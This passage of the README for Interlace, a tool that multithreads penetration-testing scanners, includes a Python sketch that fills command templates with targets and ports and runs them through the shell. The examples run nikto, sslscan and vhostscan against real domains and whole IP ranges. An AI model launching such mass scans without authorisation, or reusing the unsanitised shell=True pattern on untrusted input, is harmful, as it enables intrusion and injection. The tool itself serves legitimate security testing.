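def render(template, target, port=None, output=None, realport=None):
    """Substitute the _target_/_host_/_port_/_output_/_realport_ placeholders."""
    subs = {
        "_target_": target,
        "_host_": target,
        "_port_": "" if port is None else str(port),
        "_output_": output or "",
        "_realport_": "" if realport is None else str(realport),
    }
    for placeholder, value in subs.items():
        template = template.replace(placeholder, value)
    return template


def build_commands(templates, targets, ports=None, output=None):
    """Cross product of commands x hosts x ports: the queue that gets threaded."""
    hosts = [h for t in targets for h in expand_target(t)]
    port_list = expand_ports(ports) if ports else [None]
    return [render(c, h, p, output) for c in templates for h in hosts for p in port_list]


def run_all(commands, threads=5, timeout=600):
    """Run the queue with at most `threads` commands at once.

    Commands go through the shell because the templates rely on redirection;
    targets are operator-supplied, never untrusted input. A command that is
    still running at `timeout` seconds is killed and reported with code None.
    """
    def run_one(cmd):
        try:
            proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=timeout)
            return cmd, proc.returncode
        except subprocess.TimeoutExpired:
            return cmd, None

    with ThreadPoolExecutor(max_workers=threads) as pool:
        return list(pool.map(run_one, commands))


if __name__ == "__main__":
    # The README's nikto example, rendered but not executed.
    queue = build_commands(
        ["nikto --host _target_:_port_ > _output_/_target_-_port_-nikto.txt"],
        ["bugcrowd.com,hackerone.com"], ports="80,443", output="./out")
    for cmd in queue:
        print("[THREAD] [%s] Added to Queue" % cmd)
```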

Usage Examples

Run Nikto Over Multiple Sites
Let's assume that you had a file targets.txt that had the following contents:
bugcrowd.com
hackerone.com
You could use interlace to run over any number of targets within this file using:
➜  /tmp interlace -tL ./targets.txt -threads 5 -c "nikto --host _target_ > ./_target_-nikto.txt" -v
==============================================
Interlace v1.0 by Michael Skelton (@codingo_)
==============================================
[14:33:23] [THREAD] [nikto --host hackerone.com > ./hackerone.com-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host bugcrowd.com > ./bugcrowd.com-nikto.txt] Added to Queue
This would run nikto over each host and save the output to a file per target. Note that because the example uses the > operator, results are not fed back to the terminal; this is desired, as otherwise there would be no way to tell which target a given set of Nikto results belongs to.
For applications where you want feedback in the terminal, simply pass commands as you normally would (or use tee).

Run Nikto Over Multiple Sites and Ports
Using the above example, let's assume you want independent scans to be run for both ports 80 and 443 for the same targets. You would then use the following:
➜  /tmp interlace -tL ./targets.txt -threads 5 -c "nikto --host _target_:_port_ > ./_target_-_port_-nikto.txt" -p 80,443 -v
==============================================
Interlace v1.0 by Michael Skelton (@codingo_)
==============================================
[14:33:23] [THREAD] [nikto --host hackerone.com:80 > ./hackerone.com-80-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host bugcrowd.com:80 > ./bugcrowd.com-80-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host bugcrowd.com:443 > ./bugcrowd.com-443-nikto.txt] Added to Queue
[14:33:23] [THREAD] [nikto --host hackerone.com:443 > ./hackerone.com-443-nikto.txt] Added to Queue

Run a List of Commands against Target Hosts
Often with penetration tests there's a list of commands you want to run on nearly every job. Assuming that list includes testssl.sh, nikto, and sslscan, you could save a command list with the following in a file called commands.txt (the file names include _port_ so that the port 80 and port 443 runs do not overwrite each other):
nikto --host _target_:_port_ > _output_/_target_-_port_-nikto.txt
sslscan _target_:_port_ > _output_/_target_-_port_-sslscan.txt
testssl.sh _target_:_port_ > _output_/_target_-_port_-testssl.txt
If you were then given a target, example.com, you could run each of these commands against it using the following:
interlace -t example.com -o ~/Engagements/example/ -cL ./commands.txt -p 80,443
This would then run nikto, sslscan, and testssl.sh for both port 80 and 443 against example.com and save the files into your engagements folder.

CIDR notation with an application that doesn't support it
Interlace automatically expands CIDR notation when starting threads (unless the --no-cidr flag is passed). This allows you to pass CIDR notation to a variety of applications:
To run a virtual host scan against every target within 192.168.12.0/24 using a direct command you could use:
interlace -t 192.168.12.0/24 -c "vhostscan _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50
This is despite VHostScan not having any inbuilt CIDR notation support. Since Interlace expands the notation before building the queue of threads, VHostScan for all intents and purposes only receives a list of individual IP addresses to scan.

Glob notation with an application that doesn't support it
Interlace automatically expands glob ranges when starting threads. This allows you to pass glob ranges to a variety of applications:
To run a virtual host scan against every target within 192.168.12.* using a direct command you could use:
interlace -t 192.168.12.* -c "vhostscan _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50
Yet again, VHostScan does not have any inbuilt glob range support.

Threading Support for an application that doesn't support it
Run a virtual host scan against each host in a file (target-list.txt), whilst also limiting scans at any one time to a maximum of 50 threads.
This could be done using a direct command:
interlace -tL ./target-list.txt -c "vhostscan -t _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50
Or, alternatively, to run the same command as above, but using a command file, this would be done using:
interlace -cL ./vhosts-commands.txt -tL ./target-list.txt -threads 50 -o ~/scans
This presumes that the contents of the command file is:
vhostscan -t _target_ -oN _output_/_target_-vhosts.txt
This would output a file for each target in the specified output folder. You could also run multiple commands simply by adding them into the command file.

Authors and Thanks
Originally written by Michael Skelton (codingo) and Sajeeb Lohani (sml555) with help from Charelle Collett (@Charcol0x89) for the threading refactoring and overall approach, and Luke Stephens (hakluke) for testing and approach.

